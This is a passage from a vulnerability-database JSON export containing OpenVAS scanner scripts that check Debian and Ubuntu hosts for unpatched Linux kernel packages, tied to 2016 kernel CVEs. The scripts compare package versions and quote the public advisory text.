rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-manual-3.16\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-source-3.16\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-support-3.16.0-4\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xen-linux-system-3.16.0-4-amd64\", ver:\"3.16.7-ckt20-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:35:19", "description": "Several vulnerabilities have been\ndiscovered in the Linux kernel that may lead to a privilege escalation or\ndenial-of-service.\n\nCVE-2013-4312\nTetsuo Handa discovered that it is possible for a process to open\nfar more files than the process", "cvss3": {}, "published": "2016-01-19T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3448-1 (linux - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0723", "CVE-2016-0728", "CVE-2015-8767", "CVE-2013-4312", "CVE-2015-7566"], "modified": "2019-05-24T00:00:00", "id": "OPENVAS:1361412562310703448", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703448", "sourceData": "# OpenVAS Vulnerability Test\n# Auto-generated from advisory DSA 3448-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703448\");\n script_version(\"2019-05-24T11:20:30+0000\");\n script_cve_id(\"CVE-2013-4312\", \"CVE-2015-7566\", \"CVE-2015-8767\", \"CVE-2016-0723\",\n \"CVE-2016-0728\");\n script_name(\"Debian Security Advisory DSA 3448-1 (linux - security update)\");\n script_tag(name:\"last_modification\", value:\"2019-05-24 11:20:30 +0000 (Fri, 24 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-01-19 00:00:00 +0100 (Tue, 19 Jan 2016)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2016/dsa-3448.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n script_tag(name:\"affected\", value:\"linux on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (jessie),\nthese problems have been fixed in version 3.16.7-ckt20-1+deb8u3.\n\nWe recommend that you upgrade your linux packages.\");\n script_tag(name:\"summary\", value:\"Several vulnerabilities have been\ndiscovered in the Linux kernel that may lead to a privilege escalation or\ndenial-of-service.\n\nCVE-2013-4312\nTetsuo Handa discovered that it is possible for a process to open\nfar more files than the process's limit leading to denial-of-service\nconditions.\n\nCVE-2015-7566\nRalf Spenneberg of OpenSource Security reported that the visor\ndriver crashes when a specially crafted USB device without bulk-out\nendpoint is detected.\n\nCVE-2015-8767\nAn SCTP denial-of-service was discovered which can be triggered by a\nlocal attacker during a heartbeat timeout event after the 4-way\nhandshake.\n\nCVE-2016-0723\nA use-after-free vulnerability was discovered in the TIOCGETD ioctl.\nA local attacker could use this flaw for denial-of-service.\n\nCVE-2016-0728\nThe Perception Point research team discovered a use-after-free\nvulnerability in the keyring facility, possibly leading to local\nprivilege escalation.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software\nversion using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"linux-compiler-gcc-4.8-arm\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-compiler-gcc-4.8-s390\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-compiler-gcc-4.8-x86\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-doc-3.16\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-4kc-malta\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-586\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-5kc-malta\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-686-pae\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-amd64\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-arm64\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-armel\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-armhf\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-i386\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-mips\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-mipsel\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-powerpc\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-ppc64el\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-s390x\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-amd64\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-arm64\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-armmp\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-armmp-lpae\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-common\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-ixp4xx\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-kirkwood\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-loongson-2e\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-loongson-2f\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-loongson-3\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-octeon\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-orion5x\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-powerpc\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-powerpc-smp\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-powerpc64\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-powerpc64le\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-r4k-ip22\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-r5k-ip32\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-s390x\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-sb1-bcm91250a\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-versatile\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-4kc-malta\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-5kc-malta\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-mips\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-mipsel\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-common\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-loongson-2f\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-octeon\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-r4k-ip22\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-r5k-cobalt\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-r5k-ip32\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-sb1-bcm91250a\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-sb1a-bcm91480b\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-4kc-malta\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-586\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-5kc-malta\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-686-pae\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-686-pae-dbg\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-amd64\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-amd64-dbg\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-arm64\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-arm64-dbg\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-armmp\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-armmp-lpae\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-ixp4xx\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-kirkwood\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-loongson-2e\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-loongson-2f\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-loongson-3\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-octeon\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-orion5x\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-powerpc\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-powerpc-smp\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-powerpc64\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-powerpc64le\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-r4k-ip22\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-r5k-ip32\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-s390x\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-s390x-dbg\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-sb1-bcm91250a\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-versatile\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-4kc-malta\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-5kc-malta\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-loongson-2f\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-octeon\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-r4k-ip22\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-r5k-cobalt\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-r5k-ip32\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-sb1-bcm91250a\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-sb1a-bcm91480b\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-libc-dev:amd64\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-libc-dev:i386\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-manual-3.16\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-source-3.16\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-support-3.16.0-4\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"xen-linux-system-3.16.0-4-amd64\", ver:\"3.16.7-ckt20-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:36", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-03-15T00:00:00", "type": "openvas", "title": "Ubuntu Update for linux USN-2930-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-2384", "CVE-2016-2782", "CVE-2016-0723", "CVE-2015-8767", "CVE-2015-7566", "CVE-2016-3135", "CVE-2016-3134"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310842691", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842691", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux USN-2930-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842691\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-03-15 06:36:46 +0100 (Tue, 15 Mar 2016)\");\n script_cve_id(\"CVE-2016-3134\", \"CVE-2016-3135\", \"CVE-2015-7566\", \"CVE-2015-8767\",\n \t\t\"CVE-2016-0723\", \"CVE-2016-2384\", \"CVE-2016-2782\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux USN-2930-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Ben Hawkes discovered that the Linux\n netfilter implementation did not correctly perform validation when handling\n IPT_SO_SET_REPLACE events. A local unprivileged attacker could use this to\n cause a denial of service (system crash) or possibly execute arbitrary code\n with administrative privileges. (CVE-2016-3134)\n\n Ben Hawkes discovered an integer overflow in the Linux netfilter\n implementation. On systems running 32 bit kernels, a local unprivileged\n attacker could use this to cause a denial of service (system crash) or\n possibly execute arbitrary code with administrative privileges.\n (CVE-2016-3135)\n\n Ralf Spenneberg discovered that the USB driver for Clie devices in the\n Linux kernel did not properly sanity check the endpoints reported by the\n device. An attacker with physical access could cause a denial of service\n (system crash). (CVE-2015-7566)\n\n It was discovered that a race condition existed when handling heartbeat-\n timeout events in the SCTP implementation of the Linux kernel. A remote\n attacker could use this to cause a denial of service. (CVE-2015-8767)\n\n It was discovered that a race condition existed in the ioctl handler for\n the TTY driver in the Linux kernel. A local attacker could use this to\n cause a denial of service (system crash) or expose sensitive information.\n (CVE-2016-0723)\n\n Andrey Konovalov discovered that the ALSA USB MIDI driver incorrectly\n performed a double-free. A local attacker with physical access could use\n this to cause a denial of service (system crash) or possibly execute\n arbitrary code with administrative privileges. (CVE-2016-2384)\n\n Ralf Spenneberg discovered that the USB driver for Treo devices in the\n Linux kernel did not properly sanity check the endpoints reported by the\n device. An attacker with physical access could cause a denial of service\n (system crash). (CVE-2016-2782)\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 15.10\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"2930-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2930-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU15\\.10\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU15.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.2.0-34-generic\", ver:\"4.2.0-34.39\", rls:\"UBUNTU15.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.2.0-34-generic-lpae\", ver:\"4.2.0-34.39\", rls:\"UBUNTU15.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.2.0-34-lowlatency\", ver:\"4.2.0-34.39\", rls:\"UBUNTU15.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.2.0-34-powerpc-e500mc\", ver:\"4.2.0-34.39\", rls:\"UBUNTU15.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.2.0-34-powerpc-smp\", ver:\"4.2.0-34.39\", rls:\"UBUNTU15.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.2.0-34-powerpc64-emb\", ver:\"4.2.0-34.39\", rls:\"UBUNTU15.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.2.0-34-powerpc64-smp\", ver:\"4.2.0-34.39\", rls:\"UBUNTU15.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:44", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-03-17T00:00:00", "type": "openvas", "title": "Ubuntu Update for linux-raspi2 USN-2930-3", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-2384", "CVE-2016-2782", "CVE-2016-0723", 